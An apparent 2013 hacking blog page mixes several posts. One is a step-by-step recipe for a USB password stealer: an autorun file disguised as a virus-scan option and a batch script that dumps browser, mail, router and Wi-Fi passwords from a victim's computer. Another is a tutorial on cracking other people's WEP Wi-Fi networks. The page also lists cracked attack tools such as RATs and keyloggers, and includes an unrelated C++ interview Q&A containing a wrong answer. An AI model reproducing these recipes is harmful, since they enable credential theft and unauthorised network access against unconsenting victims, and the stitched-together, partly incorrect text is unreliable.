Friday, 21 June 2013

             Steal All Passwords Of Computer Using USB


How to steal passwords from a computer with USB in just seconds???

Here is the tutorial you want fanz, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes. 


How to make stealer?

Download This Ready made Files or make your own way as shown below. Pass Stealer

Or Custom Making of stealer:

Step 1: Open Notepad and Create a new file.

Type or copy/paste Text below:-

ACTION= Perform a Virus Scan

Save this as AUTORUN.inf (NOTE: extension must be .inf  not .txt)

Step 2: Now again open Notepad and Create a new file.
Type or copy/paste Text below…

start mspass.exe /stext pass/mspass.txt
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt

Save this as LAUNCH.bat
Now you have 2 files…

Step 3: Copy the autorun and launch file to your USB…

Step 4: Go to

And download the programs which you named in Step 2… and copy them with your other files that is autorun and launch.bat files.

How to use?

  • Now copy our ready made pass stealer files or your setup files to your usb drive. 
  • Now re-plug USB. 
  • Choose Perform A Virus Scan Option, on auto-run menu.
  • Era..!!! All Pass r steal and in pass folder.
  • You can run launch.bat file direct and steal pass.
Note: These File are may be deleted by antivirus. So be care-full.


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  • Havij Pro 1.17 Cracked {Advance SQL Injection T00l}
  • OWASP Xenotix  {Advance XSS Exploiter}
  • Web Cruiser  Website attacker {Web App Exploitation T00l}
  • E-mail Spoofing attacker {PHP Script to Spoof E-mails}
  • WappEx 2.0 {Web App Exploitation T00l}
  • Backtrack 5 RC3 {Most Wanted Hacking OS}
  • Kali Linux {Bactrack 6 Hacking OS}
  • Dark Comet RAT legacy 5.4 {Hacking and Spying}
  • John The Ripper {Fastest Password Cracking Tool}
  • NT-SQL Invader {Web Exploitation T00l}
  • Backbox 3.0 {Penetration testing OS for Hackers}
  • B88 {Bypass and Stop Victim's Antivirus}
  • Ettercap 1.2 {Packet Sniffer and MITM}
  • Pro RAT 2.0 {Remote Access Trojan (Most wanted)}
  • 0G0 cPanel Password Cracker {CPanel Cracker}
  • SQL P0!Z0N v1.1 {Web Exploitation T00l}
  • Metasploit {Most wanted Computer Pentesting T00l}
  • Brutus2 {Brute Force attacker and Password Cracker}
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  • Acunetix Web Vulnerability Scanner 8 {WVS & WET}
  • Blind Cat SQL Injection Cat Tool {Web Exploitation Tool}
  • Star Tools 2.0 {SET Tool}
  • SQL Power Injector {Web Exploitation Tool}
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  • Emmissary Keylogger {SET and Spying Tool}

    C++ Interview Questions

    1. Explain Copy Constructor.
    It is a constructore which initializes it's object member variable with another object of the same class. If you don't implement a copy constructor in your class, the compiler automatically does it.

    2. When do you call copy constructors?

    Copy constructors are called in these situations:
    i.)when compiler generates a temporary object
    ii.)when a function returns an object of that class by value
    iii.)when the object of that class is passed by value as an argument to a function
    iv.)when you construct an object based on another object of the same class

    3. Name the implicit member functions of a class.

    i.) default ctor
    ii.) copy ctor
    iii.) assignment operator
    iv.) default destructor
    v.) address operator

    4. Explain storage qualifiers in C++.

    i.) Const - This variable means that if the memory is initialised once, it should not be altered by a program.
    ii.) Volatile - This variable means that the value in the memory location can be altered even though nothing in the program code modifies the contents.
    iii.) Mutable - This variable means that a particular member of a structure or class can be altered even if a particular structure variable, class, or class member function is constant.

    5. Explain dangling pointer.

    When the address of an object is used after its lifetime is over, dangling pointer comes into existence. Some examples of such situations are: Returning the addresses of the automatic variables from a function or using the address of the memory block after it is freed.

    6. In what situations do you have to use initialization list rather than assignment in constructors.

    When you want to use non-static const data members and reference data members you should use initialization list to initialize them.

    7. When does a class need a virtual destructor?

    If your class has at least one virtual function, you should have a virtual destructor. This allows you to delete a dynamic object through a baller to a base class object. In absence of this, the wrong destructor will be invoked during deletion of the dynamic object.

    8. What is the type of “this” pointer? When does it get created?

    It is a constant pointer type. It gets created when a non-static member function of a class is called.

    9. How would you differentiate between a pre and post increment operators while overloading?

    Mentioning the keyword int as the second parameter in the post increment form of the operator++() helps distinguish between the two forms.

    10. What is a pdb file?

    A program database (PDB) file contains debugging and project state information that allows incremental linking of a Debug configuration of the program. This file is created when you compile a C/C++ program with /ZI or /Zi or a Visual Basic/C#/JScript .NET program with /debug.

    11. You run a shell on UNIX system. How would you tell which shell are you running?

    To check this you can simply do the Echo $RANDOM.
    The results will be:
    - Undefined variable if you are from the C-Shell,
    - A return prompt if you are from the Bourne shell,
    - A 5 digit random number if you are from the Korn shell. You could also do a ps -l and look for the shell with the highest PID.

    12.What are Stacks? Give an example where they are useful. 

    A Stack is a linear structure in which insertions and deletions are always made at one end i.e the top - this is termed as last in, first out (LIFO). Stacks are useful when we need to check some syntex errors like missing parentheses.

    13. Differentiate between an external iterator and an internal iterator? What is the advantage of an external iterator. 

    An external iterator is implemented as a separate class that can be "attach" to the object that has items to step through while an internal iterator is implemented with member functions of the class that has items to step through. With an external iterator many different iterators can be active simultaneously on the same object - this is its basic advantage.

    14. Do you think the following code is fine? If not, what is the problem? 

    T *p = 0;
    delete p;
    No, the code has a problem. The program will crash in an attempt to delete a null pointer.

    15. In a function declaration, what does extern mean?

    The extern here tells the compiler about the existence of a variable or a function, even though the compiler hasn’t yet seen it in the file currently being compiled. This variable or function may be defined in another file or further down in the current file.

    16. You want to link a C++ program to C functions. How would you do it?

    This can be done by using the extern "C" linkage specification around the C function declarations.

    17. Exlpain STL.

    STL stands for Standard Template Library. It is a library of container templates approved by the ANSI committee for inclusion in the standard C++ specification.

    18. What are the different types of STL containers?

    Following are the 3 types of STL containers:
    1. Adaptive containers - for e.g. queue, stack
    2. Associative containers - for e.g. set, map
    3. Sequence containers - for e.g. vector, deque

    19. Explain Stack unwinding

    Stack unwinding is a process during exception handling when the destructor is called for all local objects between the place where the exception was thrown and where it is caught.

    20. How would you find out if a linked-list is a cycle or not?

    We can find out if the linked-list is not a cycle by using two pointers. One of them goes 2 nodes every time while the second one goes at 1 node each time. If there is a cycle, the one that goes 2 nodes each time will meet the one that goes slower. If this happens, you can say that the linked-list is a cycle else not.

    Thursday, 20 June 2013


    7:54 PM |


    Hi all users I think many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on Backtrack and other Linux Tools . So today I'm here for sharing a method to Crack WiFi networks using WEP security protocol .The WEP is a very vulnerable to attacks and can be cracked easily .

    It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it . 

    You will be using two tools :


    1. Commview for WiFi : You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to 

    convert the .ncp to .cap .

    Get it from HERE

     2. Aircrack-Ng GUI : You will use this tool to crack the password of the Access Point using the . Cap files you obtained from the Commview application .

    Note :- You need to run this as administrator . 

    These are the links to the official website of the tools . Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

    Get it from HERE


    Now Get Ready to Crack :

    Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .

    Note :- You will not be able to connect to any Network using WiFi when using CommView .

    Step 2 : Click on the PLAY ICON in the Left First .


     Click on Image to Enlarge it


    Step 3 : (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button .

        Click on Image to Enlarge it


    Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Column and Click on CAPTURE.

    Note :- This tutorial is only for WEP protected networks .

    Click on Image to Enlarge it

    Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .

    Click on Image to Enlarge it

    Step 6 : (Saving the Packets ) : Now that the Packets are getting captured you need to Save them. Click on Settings->Options->Memory Usage Change Maximum Packets in buffer to 20000.
     Click on Image to Enlarge it

    Click on the LOGGING Tab .


    In the Maximum Directory Size : 5000

    Average Log File Size : 50

    Click on Image to Enlarge it

    Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory . 

    Step 7 : ( Concatenating the Logs ) : Since you are capturing a lot of logs you will need to concatenate them into once file . To do this go to Logging and click on CONCATENATE LOGS Choose all the files that have been saved in your specified folder and Concatenate them . 

    Click on Image to Enlarge it

    Step 8 : (Converting .ncf to .cap ) : Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .

    Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format .

     Click on Image to Enlarge it

    Aircrack Part :

    Now for the Second Part Cracking this is very simple . Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others .

     Click on Image to Enlarge it

    If you have any questions or having problems post a thread i will reply . This is a simple tutorial . There is more advance using the rules and stuff but I haven't used it yet . This worked for me . Hope you found it useful . Took a lot of time . Please leave your feedback